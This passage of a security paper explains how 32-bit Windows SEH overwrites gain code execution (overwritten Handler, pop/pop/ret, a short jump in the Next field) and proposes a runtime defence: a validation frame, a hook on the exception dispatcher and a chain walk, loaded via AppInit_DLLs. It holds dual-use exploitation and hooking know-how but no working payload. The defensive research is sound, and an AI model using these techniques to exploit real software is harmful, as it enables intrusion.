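} registration_record;

/* Stand-in for the 0xffffffff end-of-chain marker. */
#define CHAIN_END ((registration_record *)(uintptr_t)-1)

/* Stand-in for fs:[0], the per-thread head of the list. */
registration_record *exception_list_head = CHAIN_END;

/* Prologue: build the record, then make it the new head of the list. */
void register_handler(registration_record *rec, handler_fn fn)
{
    rec->handler = fn;                   /* 1. push handler address    */
    rec->next    = exception_list_head;  /* 2-3. mov eax,fs:[0] / push */
    exception_list_head = rec;           /* 4. mov fs:[0],esp          */
}

/* Epilogue: restore the previous head, as mov fs:[0],ecx does. */
void unregister_handler(registration_record *rec)
{
    assert(exception_list_head == rec);  /* records are removed LIFO */
    exception_list_head = rec->next;
}
```

A caller would declare a registration_record as a local variable, which is
what places the record on the thread's stack, call register_handler on entry,
and call unregister_handler before returning.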
|
||||
|
||||
|
||||
The important things to take away from this description of exception handler
|
||||
registration are as follows. First, the registration of exception handlers is
|
||||
a runtime operation. This means that whenever a function is entered that makes
|
||||
use of an exception handler, it must dynamically register the exception
|
||||
handler. This has implications as it relates to performance overhead. Second,
|
||||
the list of registered exception handlers is stored on a per-thread basis.
|
||||
This makes sense because threads are considered isolated units of execution and
|
||||
therefore exception handlers are only relevant to a particular thread. The
|
||||
final, and perhaps most important, thing to take away from this is that the
|
||||
assembly generated by the compiler to register an exception handler at runtime
|
||||
makes use of the current thread's stack. This fact will be revisited later in
|
||||
this section.
|
||||
|
||||
In the event that an exception occurs during the course of normal execution,
|
||||
the operating system will step in and take the necessary steps to dispatch the
|
||||
exception. In the event that the exception occurred in the context of a thread
|
||||
that is running in user-mode, the kernel will take the exception information
|
||||
and generate an EXCEPTION_RECORD that is used to encapsulate all of the
|
||||
exception information. Furthermore, a snapshot of the executing state of the
|
||||
thread is created in the form of a populated CONTEXT structure. The kernel
|
||||
then passes this information off to the user-mode thread by transferring
|
||||
execution from the location that the fault occurred at to the address of
|
||||
ntdll!KiUserExceptionDispatcher. The important thing to understand about this
|
||||
is that execution of the exception dispatcher occurs in the context of the
|
||||
thread that generated the exception.
|
||||
|
||||
The job of ntdll!KiUserExceptionDispatcher is, as the name implies, to dispatch
|
||||
user-mode exceptions. As one might guess, the way that it goes about doing
|
||||
this is by walking the chain of registered exception handlers stored relative
|
||||
to the current thread. As the exception dispatcher walks the chain, it calls the
|
||||
handler associated with each registration record, giving that handler the
|
||||
opportunity to handle, fail, or pass on the exception.
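
The chain walk just described can be sketched in portable C. This is a
simplified model, not the logic of ntdll: the disposition values, the
handler signature, and the names dispatch_exception, pass_along and
handle_access_violation are assumptions made for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Simplified dispositions (illustrative, not the Windows definitions). */
typedef enum { CONTINUE_EXECUTION, CONTINUE_SEARCH } disposition;

typedef disposition (*handler_fn)(uint32_t exception_code);

typedef struct registration_record {
    struct registration_record *next;
    handler_fn                  handler;
} registration_record;

#define CHAIN_END ((registration_record *)(uintptr_t)-1)

/* Walk the chain from its head and call each handler in turn. Returns the
 * record whose handler accepted the exception, or NULL if none did. */
registration_record *dispatch_exception(registration_record *head,
                                        uint32_t code)
{
    for (registration_record *rec = head; rec != CHAIN_END; rec = rec->next) {
        assert(rec->handler != NULL);
        if (rec->handler(code) == CONTINUE_EXECUTION)
            return rec;
    }
    return NULL;
}

/* A handler that always passes the exception on. */
disposition pass_along(uint32_t code)
{
    (void)code;
    return CONTINUE_SEARCH;
}

/* A handler that only accepts access violations (0xc0000005). */
disposition handle_access_violation(uint32_t code)
{
    return code == 0xc0000005u ? CONTINUE_EXECUTION : CONTINUE_SEARCH;
}
```

The point to notice is that the dispatcher calls whatever address is stored
in each record's handler field, which is why the integrity of those records
matters.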
|
||||
|
||||
|
||||
While there are other things involved in the exception dispatching process,
|
||||
this description will suffice to set the stage for how it might be abused to
|
||||
gain code execution.
|
||||
|
||||
|
||||
2.2) Gaining Code Execution
|
||||
|
||||
There is one important thing to remember when it comes to trying to gain code
|
||||
execution through an SEH overwrite. Put simply, the fact that each exception
|
||||
registration record is stored on the stack lends itself well to abuse when
|
||||
considered in conjunction with a conventional stack-based buffer overflow. As
|
||||
described in section 2.1, each exception registration record is composed of a Next
|
||||
pointer and a Handler function pointer. Of most interest in terms of
|
||||
exploitation is the Handler attribute. Since the exception dispatcher makes use
|
||||
of this attribute as a function pointer, it makes sense that should this
|
||||
attribute be overwritten with attacker controlled data, it would be possible to
|
||||
gain code execution. In fact, that's exactly what happens, but with an added
|
||||
catch.
|
||||
|
||||
While typical stack-based buffer overflows work by overwriting the return
|
||||
address, an SEH overwrite works by overwriting the Handler attribute of an
|
||||
exception registration record that has been stored on the stack. Unlike
|
||||
overwriting the return address, where control is gained immediately upon return
|
||||
from the function, an SEH overwrite does not actually gain code execution until
|
||||
after an exception has been generated. The exception is necessary in order to
|
||||
cause the exception dispatcher to call the overwritten Handler.
|
||||
|
||||
While this may seem like something of a nuisance that would make SEH overwrites
|
||||
harder to exploit, it's not. Generating an exception that leads to the calling
|
||||
of the Handler is as simple as overwriting the return address with an invalid
|
||||
address in most cases. When the function returns, it attempts to execute code
|
||||
from an invalid memory address which generates an access violation exception.
|
||||
This exception is then passed onto the exception dispatcher which calls the
|
||||
overwritten Handler.
|
||||
|
||||
The obvious question to ask at this point is what benefit SEH overwrites have
|
||||
over the conventional practice of overwriting the return address. To
|
||||
understand this, it's important to consider one of the common practices
|
||||
employed in Windows-based exploits. On Windows, thread stack addresses tend to
|
||||
change quite frequently between operating system revisions and even across
|
||||
process instances. This differs from most UNIX derivatives where stack
|
||||
addresses are typically predictable across multiple operating system revisions.
|
||||
Due to this fact, most Windows-based exploits will indirectly transfer control
|
||||
into the thread's stack by first bouncing off an instruction that exists
|
||||
somewhere in the address space. This instruction must typically reside at an
|
||||
address that is less prone to change, such as within the code section of a
|
||||
binary. The purpose of this instruction is to transfer control back to the
|
||||
stack in a position-independent fashion. For example, a jmp esp instruction
|
||||
might be used. While this approach works perfectly fine, it's limited by
|
||||
whether or not an instruction can be located that is both portable and reliable
|
||||
in terms of the address that it resides at. This is where the benefits of SEH
|
||||
overwrites begin to become clear.
|
||||
|
||||
When simply overwriting the return address, an attacker is often limited to a
|
||||
small set of instructions that are not commonly found at a reliable
|
||||
and portable location in the address space. On the other hand, SEH overwrites
|
||||
have the advantage of being able to use another set of instructions that are
|
||||
far more prevalent in the address space of almost every process. This set of
|
||||
instructions is commonly referred to as pop/pop/ret. The reason this class of
|
||||
instructions can be used with SEH overwrites and not general stack overflows
|
||||
has to do with the method in which exception handlers are called by the
|
||||
exception dispatcher. To understand this, it is first necessary to know what
|
||||
the specific prototype is for the Handler field in the
|
||||
EXCEPTION_REGISTRATION_RECORD structure:
|
||||
|
||||
|
||||
typedef EXCEPTION_DISPOSITION (*ExceptionHandler)(
|
||||
IN PEXCEPTION_RECORD ExceptionRecord,
|
||||
IN PVOID EstablisherFrame,
|
||||
IN PCONTEXT ContextRecord,
|
||||
IN PVOID DispatcherContext);
|
||||
|
||||
|
||||
The field of most importance is the EstablisherFrame. This field actually
|
||||
points to the address of the exception registration record that was pushed onto
|
||||
the stack. It is also located at [esp+8] when the Handler is called.
|
||||
Therefore, if the Handler is overwritten with the address of a pop/pop/ret
|
||||
sequence, the result will be that the execution path of the current thread will
|
||||
be transferred to the address of the Next attribute for the current exception
|
||||
registration record. While this field would normally hold the address of the
|
||||
next registration record, it instead can hold four bytes of arbitrary code that
|
||||
an attacker can supply when triggering the SEH overwrite. Since there are only
|
||||
four contiguous bytes of memory to work with before hitting the Handler field,
|
||||
most attackers will use a simple short jump sequence to jump past the handler
|
||||
and into the attacker controlled code that comes after it.
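
The arithmetic behind this can be checked with a small portable C model. It
is a sketch only: pop_pop_ret and short_jump_target are hypothetical helper
names, the stack is represented as three 32-bit slots, and any addresses
passed in are purely illustrative.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Model of pop/pop/ret executing on the stack a handler sees at entry:
 *   stack[0] = [esp]    return address into the dispatcher
 *   stack[1] = [esp+4]  ExceptionRecord
 *   stack[2] = [esp+8]  EstablisherFrame
 * Returns the address that execution continues at. */
uint32_t pop_pop_ret(const uint32_t stack[3])
{
    size_t sp = 0;

    assert(stack != NULL);
    sp++;              /* pop: discard the return address       */
    sp++;              /* pop: discard the ExceptionRecord slot */
    return stack[sp];  /* ret: continue at EstablisherFrame     */
}

/* Destination of a two-byte x86 short jump (EB rel8) located at addr.
 * The displacement is relative to the end of the instruction. */
uint32_t short_jump_target(uint32_t addr, int8_t rel8)
{
    return addr + 2 + (uint32_t)(int32_t)rel8;
}
```

With the registration record at address F, pop_pop_ret yields F, which is the
Next field. A short jump placed there with a displacement of 6 lands at F + 8,
the first byte after the four-byte Handler field.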
|
||||
|
||||
|
||||
3) Design
|
||||
|
||||
The one basic requirement of any solution attempting to prevent the leveraging
|
||||
of SEH overwrites is that it must not be possible for an attacker to be able to
|
||||
supply a value for the Handler attribute of an exception registration record
|
||||
that is subsequently used in an unchecked fashion by the exception dispatcher
|
||||
when an exception occurs. If a solution can claim to have satisfied this
|
||||
requirement, then it should be true that the solution is secure.
|
||||
|
||||
To that point, Microsoft's solution is secure, but only if all of the images
|
||||
loaded in the address space have been compiled with /SAFESEH. Even then, it's
|
||||
possible that it may not be completely secure. For example, it should be
|
||||
possible to overwrite the Handler with the address of some non-image associated
|
||||
executable region, if one can be found. If there are any images that have not
|
||||
been compiled with /SAFESEH, it may be possible for an attacker to overwrite
|
||||
the Handler with an address of an instruction that resides within an
|
||||
unprotected image. The reason Microsoft's implementation cannot protect
|
||||
against this is because SafeSEH works by having the exception dispatcher
|
||||
validate handlers against a table of image-specific safe exception handlers
|
||||
prior to calling an exception handler. Safe exception handlers are stored in a
|
||||
table that is contained in any executable compiled with /SAFESEH. Given this
|
||||
limitation, it can also be said that Microsoft's implementation is not secure
|
||||
given the appropriate conditions. In fact, for third-party applications, and
|
||||
even some Microsoft-provided applications, these conditions are considered by
|
||||
the author to be the norm rather than the exception. In the end, it all boils
|
||||
down to the fact that Microsoft's solution is a compile-time solution rather
|
||||
than a runtime solution. With these limitations in mind, it makes sense to
|
||||
attempt to approach the problem from the angle of a runtime solution rather
|
||||
than a compile-time solution.
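
The limitation described above can be seen in a deliberately simplified
model of a table-based check. This is not the logic used by Windows; the
image structure, its fields, and handler_allowed are hypothetical, and the
model encodes only what the text states: an image either carries a table of
safe handlers or it does not.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical description of a loaded image. */
typedef struct image {
    uint32_t        base;
    uint32_t        size;
    const uint32_t *safe_handlers;  /* NULL: not built with /SAFESEH */
    size_t          safe_count;
} image;

/* Returns 1 if the model would let the dispatcher call handler. */
int handler_allowed(const image *images, size_t n, uint32_t handler)
{
    assert(images != NULL || n == 0);
    for (size_t i = 0; i < n; i++) {
        const image *img = &images[i];

        if (handler - img->base >= img->size)
            continue;                  /* not inside this image */
        if (img->safe_handlers == NULL)
            return 1;                  /* no table, nothing to check */
        for (size_t j = 0; j < img->safe_count; j++)
            if (img->safe_handlers[j] == handler)
                return 1;              /* listed as a safe handler */
        return 0;                      /* inside a protected image, unlisted */
    }
    return 1;                          /* outside every image in the model */
}
```

In this model a single image without a table is enough to give an attacker
usable Handler values, which is the gap a runtime approach tries to close.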
|
||||
|
||||
When it comes to designing a runtime solution, the important consideration that
|
||||
has to be made is that it will be necessary to intercept exceptions before they
|
||||
are passed off to the registered exception handlers by the exception
|
||||
dispatcher. The particulars of how this can be accomplished will be discussed
|
||||
in chapter 4. Assuming a solution is found to the layering problem, the next
|
||||
step is to come up with a solution for determining whether or not an exception
|
||||
handler is valid and has not been tampered with. While there are many
|
||||
inefficient solutions to this problem, such as coming up with a solution to
|
||||
keep a ``secure'' list of registered exception handlers, there is one solution
|
||||
in particular that the author feels is best suited for the problem.
|
||||
|
||||
One of the side effects of an SEH overwrite is that the attacker will typically
|
||||
clobber the value of the Next attribute associated with the exception
|
||||
registration record that is overwritten. This occurs because the Next
|
||||
attribute precedes the Handler attribute in memory, and therefore must be
|
||||
overwritten before the Handler in the case of a typical buffer overflow. This
|
||||
has a very important side effect that is the key to facilitating the
|
||||
implementation of a runtime solution. In particular, the clobbering of the
|
||||
Next attribute means that all subsequent exception registration records would
|
||||
not be reachable by the exception dispatcher when walking the chain.
|
||||
|
||||
Consider for the moment a solution that, during thread startup, places a custom
|
||||
exception registration record as the very last exception registration record in
|
||||
the chain. This exception registration record will be symbolically referred to
|
||||
as the validation frame henceforth. From that point forward, whenever an
|
||||
exception is about to be dispatched, the solution could walk the chain prior to
|
||||
allowing the exception dispatcher to handle the exception. The purpose of
|
||||
walking the chain beforehand is to ensure that the validation frame can be
|
||||
reached. As such, the validation frame's purpose is similar to that of stack
|
||||
canaries. If the validation frame can be reached, then that is evidence of the
|
||||
fact that the chain of exception handlers has not been corrupted. As described
|
||||
above, the act of overwriting the Handler attribute also requires that the Next
|
||||
pointer be overwritten. If the Next pointer is not overwritten with an address
|
||||
that ensures the integrity of the exception handler chain, then this solution
|
||||
can immediately detect that the integrity of the chain is in question and
|
||||
prevent the exception dispatcher from calling the overwritten Handler.
|
||||
|
||||
Using this technique, the act of ensuring that the integrity of the exception
|
||||
handler chain is kept intact results in the ability to prevent SEH overwrites.
|
||||
The important questions to ask at this point center around what limitations
|
||||
this solution might have. The most obvious question to ask is what's to stop
|
||||
an attacker from simply overwriting the Next pointer with the value that was
|
||||
already there. There are a few things that stop this. First of all, it will
|
||||
be common that the attacker does not know the value of the Next pointer.
|
||||
Second, and perhaps most important, is that one of the benefits of using an SEH
|
||||
overwrite is that an attacker can make use of a pop/pop/ret sequence. By
|
||||
forcing an attacker to retain the value of the Next pointer, the major benefit
|
||||
of using an SEH overwrite in the first place is gone. Even conceding this
|
||||
point, an attacker who is able to retain the value of the Next pointer would
|
||||
find themselves limited to overwriting the Handler with the address of
|
||||
instructions that indirectly transfer control back to their code. However, the
|
||||
attacker won't simply be able to use an instruction like jmp esp because the
|
||||
Handler will be called in the context of the exception dispatcher. It's at
|
||||
this point that diminishing returns are reached and an attacker is better off
|
||||
simply overwriting the return address, if possible.
|
||||
|
||||
Another important question to ask is what's to stop the attacker from
|
||||
overwriting the Next pointer with the address of the validation frame itself
|
||||
or, more easily, with 0xffffffff. The answer to this is much the same as
|
||||
described in the above paragraph. Specifically, by forcing an attacker away
|
||||
from the pop/pop/ret sequence, the usefulness of the SEH overwrite vector
|
||||
quickly degrades to the point of it being better to simply overwrite the return
|
||||
address, if possible. However, in order to be sure, the author feels that
|
||||
implementations of this solution would be wise to randomize the location of the
|
||||
validation frame.
|
||||
|
||||
It is the author's opinion that the solution described above satisfies the
|
||||
requirement outlined in the beginning of this chapter and therefore qualifies
|
||||
as a secure solution. However, there's always a chance that something has been
|
||||
missed. For that reason, the author is more than happy to be proven wrong on
|
||||
this point.
|
||||
|
||||
|
||||
4) Implementation
|
||||
|
||||
The implementation of the solution described in the previous chapter relies on
|
||||
intercepting exceptions prior to allowing the native exception dispatcher to
|
||||
handle them such that the exception handler chain can be validated. First and
|
||||
foremost, it is important to identify a way of layering prior to the point that
|
||||
the exception dispatcher transfers control to the registered exception
|
||||
handlers. There are a few different places that this layering could occur at,
|
||||
but the one that is best suited to catch the majority of user-mode exceptions
|
||||
is at the location that ntdll!KiUserExceptionDispatcher gains control.
|
||||
However, by hooking ntdll!KiUserExceptionDispatcher, it is possible that this
|
||||
implementation may not be able to intercept all cases of an exception being
|
||||
raised, thus making it potentially feasible to bypass the exception handler
|
||||
chain validation.
|
||||
|
||||
The best location to layer at would be ntdll!RtlDispatchException. The
|
||||
reason for this is that exceptions raised through ntdll!RtlRaiseException, such
|
||||
as software exceptions, may be passed directly to ntdll!RtlDispatchException
|
||||
rather than going through ntdll!KiUserExceptionDispatcher first. The condition
|
||||
that controls this is whether or not a debugger is attached to the user-mode
|
||||
process when ntdll!RtlRaiseException is called. The reason
|
||||
ntdll!RtlDispatchException is not hooked in this implementation is because it
|
||||
is not directly exported. There are, however, fairly reliable techniques that
|
||||
could be used to determine its address. As far as the author is aware, the act
|
||||
of hooking ntdll!KiUserExceptionDispatcher should mean that it's only possible
|
||||
to miss software exceptions, which are much harder, and in most cases
|
||||
impossible, for an attacker to generate.
|
||||
|
||||
In order to layer at ntdll!KiUserExceptionDispatcher, the first few
|
||||
instructions of its prologue can be overwritten with an indirect jump to a
|
||||
function that will be responsible for performing any sanity checks necessary.
|
||||
Once the function has completed its sanity checks, it can transfer control back
|
||||
to the original exception dispatcher by executing the overwritten instructions
|
||||
and then jumping back into ntdll!KiUserExceptionDispatcher at the offset of the
|
||||
next instruction to be executed. This is a nice and ``clean'' way of
|
||||
accomplishing this and the performance overhead is minuscule. Here, ``clean'' is
|
||||
defined as the best it can get from a third-party perspective.
|
||||
|
||||
In order to hook ntdll!KiUserExceptionDispatcher, the first n instructions,
|
||||
where n is the number of instructions that it takes to cover at least 6 bytes,
|
||||
must be copied to a location that will be used by the hook to execute the
|
||||
actual ntdll!KiUserExceptionDispatcher. Following that, the first n
|
||||
instructions of ntdll!KiUserExceptionDispatcher can then be overwritten with an
|
||||
indirect jump. This indirect jump will be used to transfer control to the
|
||||
function that will validate the exception handler chain prior to allowing the
|
||||
original exception dispatcher to handle the exception.
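
Two small pieces of this hooking step lend themselves to a portable C sketch:
working out how many bytes of whole instructions must be relocated, and
encoding the indirect jump itself. The helper names are hypothetical, and the
instruction lengths are assumed to come from a length disassembler that is
not shown here. The encoding FF 25 followed by a 32-bit address is the 32-bit
x86 form of jmp dword ptr [address], which is six bytes long.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define INDIRECT_JMP_SIZE 6  /* FF 25 + 32-bit address of the pointer slot */

/* Given the lengths of the leading instructions of the hooked function,
 * return how many bytes must be relocated so that whole instructions cover
 * at least need bytes. Returns 0 if the supplied lengths fall short. */
size_t bytes_to_relocate(const uint8_t *insn_lengths, size_t count,
                         size_t need)
{
    size_t total = 0;

    assert(insn_lengths != NULL || count == 0);
    for (size_t i = 0; i < count; i++) {
        total += insn_lengths[i];
        if (total >= need)
            return total;
    }
    return 0;
}

/* Encode jmp dword ptr [slot_addr], where slot_addr is the address of a
 * pointer-sized slot that holds the address of the validation routine. */
void encode_indirect_jmp(uint8_t out[INDIRECT_JMP_SIZE], uint32_t slot_addr)
{
    assert(out != NULL);
    out[0] = 0xff;
    out[1] = 0x25;
    out[2] = (uint8_t)(slot_addr);        /* little-endian address */
    out[3] = (uint8_t)(slot_addr >> 8);
    out[4] = (uint8_t)(slot_addr >> 16);
    out[5] = (uint8_t)(slot_addr >> 24);
}
```

If the relocated span is longer than six bytes, the bytes left over after the
jump are never executed, and the copy of the original instructions must end
with a jump back to the first instruction that was not relocated.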
|
||||
|
||||
With the hook installed, the next step is to implement the function that will
|
||||
actually validate the exception handler chain. The basic steps involved in
|
||||
this are to first extract the head of the list from fs:[0] and then iterate
|
||||
over each entry in the list. For each entry, the function should validate that
|
||||
the Next attribute points to a valid memory location. If it does not, then the
|
||||
chain can be assumed to be corrupt. However, if it does point to valid memory,
|
||||
then the routine should check to see if the Next pointer is equal to the
|
||||
address of the validation frame that was previously stored at the end of the
|
||||
exception handler chain for this thread. If it is equal to the validation
|
||||
frame, then the integrity of the chain is confirmed and the exception can be
|
||||
passed to the actual exception dispatcher.
|
||||
|
||||
However, if the function reaches an invalid Next pointer, or it reaches
|
||||
0xffffffff without encountering the validation frame, then it can assume that
|
||||
the exception handler chain is corrupt. It's at this point that the function
|
||||
can take whatever steps are necessary to discard the exception, log that a
|
||||
potential exploitation attempt occurred, and so on. The end result should be
|
||||
the termination of either the thread or the process, depending on
|
||||
circumstances. This algorithm is captured by the pseudo-code below:
|
||||
|
||||
|
||||
    CurrentRecord = fs:[0];
    ChainCorrupt  = TRUE;
    while (CurrentRecord != 0xffffffff) {
        if (IsInvalidAddress(CurrentRecord->Next))
            break;
        if (CurrentRecord->Next == ValidationFrame) {
            ChainCorrupt = FALSE;
            break;
        }
        CurrentRecord = CurrentRecord->Next;
    }
    if (ChainCorrupt == TRUE)
        ReportExploitationAttempt();
    else
        CallOriginalKiUserExceptionDispatcher();
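
The chain walk can also be modeled outside of a debugger. The following is a
minimal sketch, not the author's implementation: memory is simulated as a
dictionary mapping a record's address to its Next pointer, and an address that
is missing from the dictionary stands in for an invalid address. It is a slight
variant of the pseudo-code in that it tests the current record rather than its
Next pointer, so a chain whose only record is the validation frame is accepted.
The max_records guard against cyclic chains and all addresses used are
assumptions made for illustration.

```python
END_OF_CHAIN = 0xFFFFFFFF


def chain_is_intact(memory, head, validation_frame, max_records=1024):
    """Walk the simulated exception handler chain starting at head.

    memory maps a record address to that record's Next pointer.
    Returns True only if the validation frame is reached.
    """
    current = head
    for _ in range(max_records):
        if current == validation_frame:
            return True   # reached the frame registered at thread startup
        if current == END_OF_CHAIN or current not in memory:
            return False  # ran off the chain or hit an invalid pointer
        current = memory[current]
    return False          # too many records; treat a cycle as corrupt


VALIDATION_FRAME = 0x0012FFB0  # hypothetical address

# An untouched chain: two handlers followed by the validation frame.
good = {0x0012FF00: 0x0012FF40,
        0x0012FF40: VALIDATION_FRAME,
        VALIDATION_FRAME: END_OF_CHAIN}

# The same chain after an overflow stored a short jump in a Next field.
bad = dict(good)
bad[0x0012FF40] = 0x909006EB

intact = chain_is_intact(good, 0x0012FF00, VALIDATION_FRAME)
overwritten = chain_is_intact(bad, 0x0012FF00, VALIDATION_FRAME)
print(intact, overwritten)
```

In the overwritten case the Next field holds code bytes rather than a pointer,
so the walk leaves mapped memory before it reaches the validation frame.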
|
||||
|
||||
|
||||
The above algorithm describes how the exception dispatching path should be
|
||||
handled. However, there is one important part remaining in order to implement
|
||||
this solution. Specifically, there must be some way of registering the
|
||||
validation frame with a thread prior to any exceptions being dispatched on that
|
||||
thread. There are a few ways that this can be accomplished. In terms of a
|
||||
proof of concept, the easiest way of doing this is to implement a DLL that,
|
||||
when loaded into a process' address space, catches the creation notification of
|
||||
new threads through a mechanism like DllMain or through the use of a TLS
|
||||
callback in the case of a statically linked library. Both of these approaches
|
||||
provide a location for the solution to establish the validation frame with the
|
||||
thread early on in its execution. However, if there were ever a case where the
|
||||
thread were to raise an exception prior to one of these routines being called,
|
||||
then the solution would improperly detect that the exception handler chain was
|
||||
corrupt.
|
||||
|
||||
One solution to this potential problem is to store state relative to each
|
||||
thread that keeps track of whether or not the validation frame has been
|
||||
registered. There are certain implications of doing this, however. First,
|
||||
it could introduce a security problem in that an attacker might be able to
|
||||
bypass the protection by somehow toggling the flag that tracks whether or not
|
||||
the validation frame has been registered. If this flag were to be toggled to
|
||||
no and an exception were generated in the thread, then the solution would have
|
||||
to assume that it can't validate the chain because no validation frame has been
|
||||
installed. Another issue with this is that it would require some location to
|
||||
store this state on a per-thread basis. A good example of a place to store
|
||||
this is in TLS, but again, it has the security implications described above.
|
||||
|
||||
A more invasive solution to the problem of registering the validation frame
|
||||
would be to somehow layer very early on in the thread's execution -- perhaps
|
||||
even before it begins executing from its entry point. The author is aware of a
|
||||
good way to accomplish this, but working out what it might be is left as an
exercise for the reader. This more invasive solution is something that would be
|
||||
an easy and elegant way for Microsoft to include support for this, should they
|
||||
ever choose to do so.
|
||||
|
||||
The final matter of how to go about implementing this solution centers around
|
||||
how it could be deployed and used with existing applications without requiring
|
||||
a recompile. The easiest way to do this in a proof of concept setting would be
|
||||
to implement these protection mechanisms in the form of a DLL that can be
|
||||
dynamically loaded into the address space of a process that is to be protected.
|
||||
Once loaded, the DLL's DllMain can take care of getting everything set up. A
|
||||
simple way to cause the DLL to be loaded is through the use of AppInit_DLLs,
|
||||
although this has some limitations. Alternatively, there are more invasive
|
||||
options that can be considered that will accomplish the goal of loading and
|
||||
initializing the DLL early on in process creation.
|
||||
|
||||
One interesting thing about this approach is that while it is targeted at being
|
||||
used as a runtime solution, it can also be used as a compile-time solution.
|
||||
This means that applications can use this solution at compile-time to protect
|
||||
themselves from SEH overwrites. Unlike Microsoft's solution, this will even
|
||||
protect them in the presence of third-party images that have not been compiled
|
||||
with the support. This can be accomplished through the use of a static library
|
||||
that uses TLS callbacks to receive notifications when threads are created, much
|
||||
like DllMain is used for DLL implementations of this solution.
|
||||
|
||||
All things considered, the author believes that the implementation described
|
||||
above, for all intents and purposes, is a fairly simplistic way of providing
|
||||
runtime protection against SEH overwrites that has minimal overhead. While the
|
||||
implementation described in this document is considered more suitable for a
|
||||
proof-of-concept or application-specific solution, there are real-world
|
||||
examples of more robust implementations, such as in Wehnus's WehnTrust product,
|
||||
a commercial side-project of the author's. Apologies for the shameless plug.
|
||||
|
||||
|
||||
5) Compatibility
|
||||
|
||||
Like most security solutions, there are always compatibility problems that must
|
||||
be considered. As it relates to the solution described in this paper, there
|
||||
are a couple of important things to keep in mind.
|
||||
|
||||
The first compatibility issue that might happen in the real world is a scenario
|
||||
where an application invalidates the exception handler chain in a legitimate
|
||||
fashion. The author is not currently aware of situations where an application
|
||||
would legitimately need to do this, but it has been observed that some
|
||||
applications, such as Cygwin, will do funny things with the exception handler
|
||||
chain that are not likely to play nice with this form of protection. In the
|
||||
event that an application invalidates the exception handler chain, the solution
|
||||
described in this paper may inadvertently detect that an SEH overwrite has
|
||||
occurred simply because it is no longer able to reach the validation frame.
|
||||
|
||||
Another compatibility issue that may occur centers around the fact that the
|
||||
implementation described in this paper relies on the hooking of functions. In
|
||||
almost every situation it is a bad idea to use function hooking, but there are
|
||||
often situations where there is no alternative, especially in closed source
|
||||
environments. The use of function hooking can lead to compatibility problems
|
||||
with other applications that also hook ntdll!KiUserExceptionDispatcher. There
|
||||
may also be instances of security products that detect the hooking of
|
||||
ntdll!KiUserExceptionDispatcher and classify it as malware-like behavior. In
|
||||
any case, these compatibility concerns center less around the fundamental
|
||||
concept and more around the specific implementation that would be required of a
|
||||
third party.
|
||||
|
||||
|
||||
6) Conclusion
|
||||
|
||||
Software-based vulnerabilities are a common problem that affects a wide array of
|
||||
operating systems. In some cases, these vulnerabilities can be exploited with
|
||||
greater ease depending on operating system specific features. One particular
|
||||
case of where this is possible is through the use of an SEH overwrite on 32-bit
|
||||
applications on the Windows platform. An SEH overwrite involves overwriting the
|
||||
Handler associated with an exception registration record. Once this occurs, an
|
||||
exception is generated that results in the overwritten Handler being called.
|
||||
As a result of this, the attacker can more easily gain control of code
|
||||
execution due to the context that the exception handler is called in.
|
||||
|
||||
Microsoft has attempted to address the problem of SEH overwrites with
|
||||
enhancements to the exception dispatcher itself and with solutions like SafeSEH
|
||||
and the /GS compiler flag. However, these solutions are limited because they
|
||||
require a recompilation of code and therefore only protect images that have
|
||||
been compiled with these flags enabled. This limitation is something that
|
||||
Microsoft is aware of and it was most likely chosen to reduce the potential for
|
||||
compatibility issues.
|
||||
|
||||
To help solve the problem of not offering complete protection against SEH
|
||||
overwrites, this paper has suggested a solution that can be used without any
|
||||
code recompilation and with negligible performance overhead. The solution
|
||||
involves appending a custom exception registration record, known as a
|
||||
validation frame, to the end of the exception list early on in thread startup.
|
||||
When an exception occurs in the context of a thread, the solution intercepts
|
||||
the exception and validates the exception handler chain for the thread by
|
||||
making sure that it can walk the chain until it reaches the validation frame.
|
||||
If it is able to reach the validation frame, then the exception is dispatched
|
||||
like normal. However, if the validation frame cannot be reached, then it is
|
||||
assumed that the exception handler chain is corrupt and that it's possible that
|
||||
an exploit attempt may have occurred. Since exception registration records are
|
||||
always prepended to the exception handler chain, the validation frame is
|
||||
guaranteed to always be the last handler.
|
||||
|
||||
This solution relies on the fact that when an SEH overwrite occurs, the Next
|
||||
attribute is overwritten before overwriting the Handler attribute. Due to the
|
||||
fact that attackers typically use the Next attribute as the location at which
|
||||
to store a short jump, it is not possible for them to both retain the integrity
|
||||
of the list and also use it as a location to store code. This important
|
||||
consequence is the key to being able to detect and prevent the leveraging of an
|
||||
SEH overwrite to gain code execution.
|
||||
|
||||
Looking toward the future, the usefulness of this solution will begin to wane
|
||||
as 64-bit versions of Windows begin to dominate the desktop environment. The
|
||||
reason 64-bit versions do not need this solution is that exception
|
||||
handling on 64-bit versions of Windows is inherently secure due to the way it's
|
||||
been implemented. However, this only applies to 64-bit binaries. Legacy
|
||||
32-bit binaries that are capable of running on 64-bit versions of Windows will
|
||||
continue to use the old style of exception handling, thus potentially leaving
|
||||
them vulnerable to the same style of attacks depending on what compiler flags
|
||||
were used. On the other hand, this solution will also become less necessary due
|
||||
to the fact that modern 32-bit x86 machines support hardware NX and can
|
||||
therefore help to mitigate the execution of code from the stack. Regardless of
|
||||
these facts, there will always be a legacy need to protect against SEH
|
||||
overwrites, and the solution described in this paper is one method of providing
|
||||
that protection.
|
||||
|
||||
A. References
|
||||
|
||||
Borland. United States Patent: 5628016.
|
||||
http://patft.uspto.gov/netacgi/nph-Parser?Sect1=PTO1&Sect2=HITOFF&d=PALL&p=1&u=%2Fnetahtml%2FPTO%2Fsrchnum.htm&r=1&f=G&l=50&s1=5,628,016.PN.&OS=PN/5,628,016&RS=PN/5,628,016;
|
||||
accessed Sep 5, 2006.
|
||||
|
||||
|
||||
Litchfield, David. Defeating the Stack based Buffer
|
||||
Overflow Prevention Mechanism of Microsoft Windows 2003 Server.
|
||||
|
||||
http://www.blackhat.com/presentations/bh-asia-03/bh-asia-03-litchfield.pdf;
|
||||
accessed Sep 5, 2006.
|
||||
|
||||
|
||||
Microsoft Corporation. Structured Exception Handling.
|
||||
|
||||
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/debug/base/structured_exception_handling.asp;
|
||||
accessed Sep 5, 2006.
|
||||
|
||||
|
||||
Microsoft Corporation. Working with the AppInit_DLLs
|
||||
registry value.
|
||||
|
||||
http://support.microsoft.com/default.aspx?scid=kb;en-us;197571;
|
||||
